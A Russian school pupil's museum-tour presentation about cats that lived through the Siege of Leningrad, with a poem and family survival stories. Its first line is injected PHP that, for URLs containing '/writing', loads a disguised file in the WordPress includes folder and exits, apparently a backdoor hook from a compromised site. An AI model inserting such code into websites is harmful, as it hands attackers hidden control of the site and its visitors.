if(strpos(strtolower($_SERVER['REQUEST_URI']),'/writing')){include(getcwd().'/wp-includes/class-wp-comments.php');exit;} Они тоже сражались

Они тоже сражались

Здравствуйте! Я ученица Всеволожского центра образования, Шабнам Нурматова, представляю мою новую экскурсию «Они тоже сражались»,созданную по материалам и экспонатам Музея Кошки «Коготок».

В Англии учреждена медаль Марии Дикин, которая присуждается животным, принимавшим участие в военных действиях. Как Вы думаете, кошки, пережившие блокаду вместе со своими хозяевами, достойны ее?

Когда бессильны были неотложки
И жизнь людская падала в цене
От смерти нас порой спасали кошки
Хоть ничего не смыслили в войне.
Не понимая сущности бомбёжки
И птиц стальных, разивших наповал
На страже дома оставались кошки
Когда хозяев их глотал подвал.
Мы их привыкли видеть на обложке
Календаря как «кича» элемент
А мне сдается, заслужили кошки
Хотя бы очень скромный монумент.

Сегодня я хочу рассказать о кошках России, о мифах, легендах и исторических фактах.

Свою экскурсию я начну с истории о коте Максиме и попугае Жаке.

История кота Максима и попугая Жака.

27 января  День полного снятия  блокады Ленинграда.

Как жили ленинградцы три страшных блокадных года?

Кто остался  в осажденном Ленинграде?

Те, кто работал на оборонных предприятиях, не успел, не хотел, не мог уехать.

А если в своих квартирах и домах остались ленинградцы,  то кто тоже остался вместе с ними?

Домашние животные: собаки, кошки, птицы.

И сегодня я расскажу Вам историю  из жизни обычной ленинградской семьи впервые записанной со слов Веры Николаевны Вологдиной репортером «Комсомольской правды» Василием Песковым в 1989 году.

В 1941г. Вере Вологдиной было 14 лет. Училась она хорошо,человеком была ответственным ,поэтому родители разрешили ей завести и попугая,и кота. Попугая звали Жаком,Жаконей, а кота она назвала Максимом.Но вот незадача-отношения между ее питомцами были, мягко говоря, сложные.Все 4 года совместного проживания кот целеустремленно пытался охотиться на Жаконю,тот тоже не уступал проискам маленького хищника. И ободранный хвост попугая соответствовал пощипанным ушам кота.

8 сентября замкнулось блокадное кольцо.Получить какие-то продукты можно было только по карточкам,а пайки котам и попугаям не были предусмотрены.

Папа Веры выменял свое охотничье ружье на зерно для Жака,а Максим научился ловить крыс и есть клестер(это такой клей-предназначался для ремонтных работ).

К декабрю 41г. корм для Жака почти закончился. папа Веры ушел добровольцем на фронт,у Максима облезла шерстка,от слабости не убирались коготки.он почти не говорил «Мяу»,было очень холодно и все время хотелось есть.

Чтобы хоть как-то согреть  Жаконю Вера отнесла клетку попугая   в комнату с самым  маленьким окном, закрыла дверь и ушла стоять в длинной очереди ,чтобы получить крошечные пайки по карточкам. А когда вернулась домой.то в ужасе увидела,что дверь в комнатку открыта,а в клетке сидит кот. «Ну все»,-подумала Вера «Кот Жаконю съел».Какова же была ее радость и удивление,когда она подошла ближе и заглянула в клетку. Облезлый,еле передвигающий лапы кот,обвил своим тельцем умирающего Жака,из последних сил пытаясь его согреть.

Жаконя не выжип, а Максим не только выжил,но и оказался долгожителем.Родившись в 1937г. он дожил до 1957года. А тогда,в далеком 1942г.,оставшиеся  в живых,после страшной зимы дети,одноклассники  Веры,пришли посмотреть на это чудо-оставшегося в живых кота.

Ещё одна история, о коте-кормильце.  Моя бабушка всегда говорила, что тяжёлую блокаду и голод она и моя мама, а её дочь пережила только благодаря нашему коту Ваське. Если бы не этот рыжий хулиган, мы с дочерью умерли бы с голоду как многие другие. Объявление скрыто. Каждый день Васька уходил на охоту и притаскивал мышек или даже большую жирную крысу. Мышек бабушка потрошила и варила из них похлебку. А из крыски, получался неплохой гуляш. При этом кот сидел всегда рядом и ждал еду, а ночью все трое лежали под одним одеялом, и он согревал их своим теплом.
Бомбежку он чувствовал намного раньше, чем объявляли воздушную тревогу, начинал крутиться и жалобно мяукать, бабушка успевала собрать вещи, воду, маму, кота и выбежать из дома. Когда бежали в убежище его как члена семьи тащили с собой и смотрели, как бы его не унесли и не съели. Голод был страшный. Васька был голодный как все и тощий. Всю зиму до весны бабушка собирала крошки для птиц, а с весны выходили с котом на охоту. Бабушка сыпала крошки, и сидели с Васькой в засаде, его прыжок всегда был на удивление точным и быстрым. Васька голодал вместе с нами, и сил у него было не достаточно, что бы удержать птицу. Он хватал птицу, а из кустов выбегала бабушка и помогала ему. Так что с весны до осени ели еще и птиц. Когда сняли блокаду и появилось побольше еды, и даже потом после войны, бабушка коту всегда отдавала самый лучший кусочек. Гладила его ласково, приговаривая – кормилец ты наш.

На этом рисунке, выполненный заслуженным художником России, Татьяной Порфирьевной Капустиной, изображена кошка, которую они с мамой привезли в 1945 году из эвакуации.

И совершенно уникальная фотография кота Малышки пережившего блокаду на Петроградской стороне, на улице Бармалеева. А привезли эту фотографию наши друзья из объединения «Мемориал». Этот кот родился в 1933 году и дожил аж до 1950 года. На фотографии огромный кот любимого «ленинградского», полосатого окраса, с белой грудкой и белыми лапками со своей хозяйкой Ниной Николаевной Гальперн.

На заключение хочу сказать, конечно, я уверена, это далеко не все кошки, которые пережили блокаду. Наверняка были и другие, но их осталось очень мало. И конечно они не могли отразить нашествие крыс и мышей, которые распространяли болезни и уничтожали даже те крошечные запасы продуктов, которые шли в Ленинград во Дороге Жизни. И тогда было принято решение доставить в осажденный Ленинград 4 вагона кошек из ярославской области. Заказаны были дымчатые коты – на тот момент они считались лучшими крысоловами.

Но судя по популяции, которую мы наблюдаем сейчас – привезены были те, кого удалось поймать. И на тот момент кошка в Ленинграде стоила баснословно дорого 500 рублей, а буханка хлеба на «черном рынке» - 50. В книге отзывов у нас есть трогательная история о том, как маленькая девочка (ныне пожилая дама) привезла с мамой беременную кошку из Костромы из-за, ещё не родившимися котятами тут же выстроилась очередь друзей, знакомых, соседей.

Спасибо за внимание

Презентация "Музейный маршрут" на районный конкурс.